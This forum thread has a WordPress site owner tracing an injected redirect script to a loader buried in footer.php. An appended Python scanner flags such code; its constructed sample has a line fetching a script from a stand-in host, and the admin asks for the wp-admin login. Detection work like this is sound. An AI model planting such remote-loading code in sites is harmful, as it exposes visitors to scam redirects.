Malicious script on site not found – some info about it

This topic contains 6 replies, has 2 voices, and was last updated by Anti-Malware Admin 8 years, 4 months ago.

    #1318

    On my site (referenced in my registration profile), there is a malicious script that sometimes puts a big white div tag over the whole page, and then redirects to a site that tells the user their OS has crashed.  It checks the referrer and doesn’t always redirect, but the script is there – I’ve seen it on multiple computers in the page source.

    If you visit any page on the site (freebyu.org), and view the source in dev. tools, you can find the script under:

    <html>
    <body>
    <div id="container">
    <div id="main">
    <script>
    HERE'S THE HACK!
    </script>

    Any recommendations on tracking this beasty down?  I've tried deactivating each plugin on my site individually, with no effect.  I want to avoid switching themes, but that's the next step if I can't find anything else to try.

    Thanks!

    #1319

    Oh, and I took the malicious script and reformatted it so that it is legible.  You can check it out as a text file on our website here:

    http://www.freebyu.org/temp/HackScript.txt

    #1320

    Sorry for the deluge, but here’s how to see what the exploit does to the site:

    Open a browser and turn on "private browsing" to disable cookies. Then Google search "FreeBYU" and click any link that goes to freebyu.org. The page will be whited out, with a "checking your browser" message and a Continue button. Do NOT click the continue button…

    #1321

    Anti-Malware Admin
    Key Master

    I have not seen this one before. Check the header.php in your theme editor. If it’s not there try the functions.php.

    I would be very interested to see the infected file if you find it. If you cannot find it I would be willing to look for it myself if you are willing to send me your wp-admin login.

    #1322

    Anti-Malware Admin
    Key Master

    Also, check your footer.php, it looks like that is where the code is showing up.

    #1327

    Yep, found it in ‘footer.php’.  I saved the hacked file as footer.txt and put it in http://www.freebyu.org/temp/footer.txt

    You can have a look at it there if you want to see how they juked your malware detector.  The malicious code is loaded from a different URL, in a chunk of code buried in the middle of a lengthy php comment.

    How in the world could they have gained access to the text of footer.php?  Could they have done that from the admin backend if they had a username?  Or would they have had to hack into the server filesystem itself?

    #1328

    Anti-Malware Admin
    Key Master

    Thanks for posting your findings, I have added this new variant to my definition updates.
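
Added example, not part of the thread and not the plugin's own detection code: a Python scanner for the pattern described in post #1327, live PHP that loads from a URL while sitting between two long block comments. It assumes "buried in the middle of a comment" means the comment was closed and reopened around the code; the function list, the 200-character threshold and the sample footer are constructed for illustration.

```python
import re

# Real PHP/WordPress calls that can load from a URL; which ones to list is an assumption.
REMOTE = re.compile(
    r"\b(?:file_get_contents|fopen|curl_init|wp_remote_get|(?:include|require)(?:_once)?)\b"
    r"[^;]*https?://", re.I)
LINE_END = re.compile(r"\n|\?>")

def split_php(src):
    """Split <?php ... ?> regions into ('code'|'comment', offset, text) runs."""
    segs, i, n = [], 0, len(src)
    while (i := src.find("<?php", i)) >= 0:
        i = start = i + 5
        while i < n and not src.startswith("?>", i):
            ch = src[i]
            if src.startswith("/*", i) or src.startswith("//", i) or ch == "#":
                if ch == "/" and src[i + 1] == "*":
                    end = src.find("*/", i + 2)
                    end = n if end < 0 else end + 2
                else:                      # line comment ends at newline or ?>
                    m = LINE_END.search(src, i)
                    end = m.start() if m else n
                segs += [("code", start, src[start:i]), ("comment", i, src[i:end])]
                i = start = end
            elif ch in "'\"":              # skip strings so 'http://' is not read as a comment
                i += 1
                while i < n and src[i] != ch:
                    i += 2 if src[i] == "\\" else 1
                i += 1
            else:
                i += 1
        segs.append(("code", start, src[start:i]))
    return [s for s in segs if s[2].strip()]   # drop whitespace-only runs

def find_buried_code(src, min_comment=200):
    """Return (line, code) for URL-loading code wedged between two long comments."""
    segs, hits = split_php(src), []
    big = lambda s: s[0] == "comment" and len(s[2]) >= min_comment
    for k in range(1, len(segs) - 1):
        kind, off, text = segs[k]
        if kind == "code" and REMOTE.search(text) and big(segs[k - 1]) and big(segs[k + 1]):
            first = off + len(text) - len(text.lstrip())   # offset of first real character
            hits.append((src.count("\n", 0, first) + 1, text.strip()))
    return hits

# Constructed sample, not the poster's file: live code between two long block comments.
SAMPLE = ("</div>\n<?php\n/*\n" + " * Theme footer notes.\n" * 12
          + "*/ echo file_get_contents('http://example.invalid/x.js'); /*\n"
          + " * More notes.\n" * 20 + "*/\nwp_footer();\n?>\n</body>")
```

Run `find_buried_code()` over each theme file's contents and review every hit by hand; heredoc strings are not parsed, so a file that uses them may need a real PHP tokenizer.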
